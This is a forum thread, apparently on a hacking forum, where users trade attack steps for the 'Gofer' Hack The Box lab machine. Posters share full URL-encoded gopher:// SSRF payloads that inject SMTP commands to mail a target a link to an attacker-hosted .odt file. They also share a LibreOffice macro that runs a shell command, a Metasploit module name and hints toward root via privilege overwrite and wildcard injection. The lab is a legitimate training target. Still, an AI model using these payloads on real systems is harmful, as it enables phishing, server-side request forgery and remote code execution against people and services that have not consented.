Posts: 157
Threads: 12
Joined: Jun 2023
(Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
That's nice. What are you using for the .odt file? I tried exploit/multi/fileformat/libreoffice_macro_exec on msf but didn't work. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: he post combolist in database forum
Posts: 3
Threads: 0
Joined: Jul 2023
[quote =“frfrfrfrfrfrf”pid ='81493'日期线='1690745736']
试试这个:gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E% 250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue% 2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word% 20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>这个</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d% 250a
[/引用]
基于这个poc,我不能使用他,你能帮我吗
Posts: 60
Threads: 1
Joined: Jun 2023
Jul 31, 2023, 11:39 AM
(This post was last modified: Jul 31, 2023, 11:39 AM by cutty.)
(Jul 31, 2023, 02:54 AM)chickensaladsand Wrote: (Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
That's nice. What are you using for the .odt file? I tried exploit/multi/fileformat/libreoffice_macro_exec on msf but didn't work.
I created mine manually. The macro isn't complicated:
Sub Main
Shell("<CMD>")
End Sub
You can do this in LibreOffice Writer. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachqr3dqbysbq5khaadg5ynnpxn2wrmw5y3rnzesun55l6lkq73yd.onion/misc.php?action=help&hid=27 if you feel this is incorrect.
Posts: 3
Threads: 0
Joined: Jul 2023
Has anyone finished it, can I ask?
Posts: 8
Threads: 0
Joined: Jul 2023
thanks for the information friend
Posts: 3
Threads: 0
Joined: Jul 2023
May I ask where your macro is placed, this is my command "gopher%253A%252F%252Fgofer.htb%253A25%252FxHELO%2520gopher.htb%250AMail%2520From%253A%2520%253Cbaihu%2540site.com%253E% 250ARCPT%2520To%253A%2520%253Cjdavis%2540gofer.htb%253E%250AData%250ATo%253A%2520jdavis%2540gofer.htb%250AFrom%253A%2520baihu%2540site.com%250ADate%253A %2520Mon%252C%25207%2520Nov% 25202016%252008%253A45%253A16%250ASubject%253A%2520An%2520example%2520email%250A%250A%253Ca%252Bhref%253D%2522http%253A%252F%252F10.10.16. 14%253A8000%252F1.odt%253E%250ASub% 2520Main%250A%2520%2520%2520%2520Shell(%2522ls%2522)%250AEnd%2520Sub%250A%253C%252Fa%253E%250A%250A.%250A%250AQUIT%250d%250a"
Posts: 60
Threads: 1
Joined: Jun 2023
(Jul 31, 2023, 01:09 PM)BaiHu Wrote: May I ask where your macro is placed, this is my command "gopher%253A%252F%252Fgofer.htb%253A25%252FxHELO%2520gopher.htb%250AMail%2520From%253A%2520%253Cbaihu%2540site.com%253E% 250ARCPT%2520To%253A%2520%253Cjdavis%2540gofer.htb%253E%250AData%250ATo%253A%2520jdavis%2540gofer.htb%250AFrom%253A%2520baihu%2540site.com%250ADate%253A %2520Mon%252C%25207%2520Nov% 25202016%252008%253A45%253A16%250ASubject%253A%2520An%2520example%2520email%250A%250A%253Ca%252Bhref%253D%2522http%253A%252F%252F10.10.16. 14%253A8000%252F1.odt%253E%250ASub% 2520Main%250A%2520%2520%2520%2520Shell(%2522ls%2522)%250AEnd%2520Sub%250A%253C%252Fa%253E%250A%250A.%250A%250AQUIT%250d%250a"
The macro goes in a malicious odt file This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachqr3dqbysbq5khaadg5ynnpxn2wrmw5y3rnzesun55l6lkq73yd.onion/misc.php?action=help&hid=27 if you feel this is incorrect.
Posts: 49
Threads: 8
Joined: Jul 2023
Posts: 60
Threads: 1
Joined: Jun 2023
(Jul 31, 2023, 09:36 PM)deathfrom Wrote: I am stuck on the pwn challenge for root. Any suggestions?
Try reversing it. It's not a traditional BOF btw. If you play with the options, you'll be able to overwrite user privs to get admin status. The rest is, essentially, wildcard injection. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachqr3dqbysbq5khaadg5ynnpxn2wrmw5y3rnzesun55l6lkq73yd.onion/misc.php?action=help&hid=27 if you feel this is incorrect.
Posts: 5
Threads: 1
Joined: Aug 2023
(Aug 01, 2023, 12:04 AM)breher Wrote: hey guys. Also very stuck at this final pwn challenge. Can someone give a suggestion how to become an admin with this app?
not really a reversing guy
Case 8 is important.. Look what it does, if you don't know what the syntax does, google it. understand what 0x.. means and how to translate it to a normal thing
|
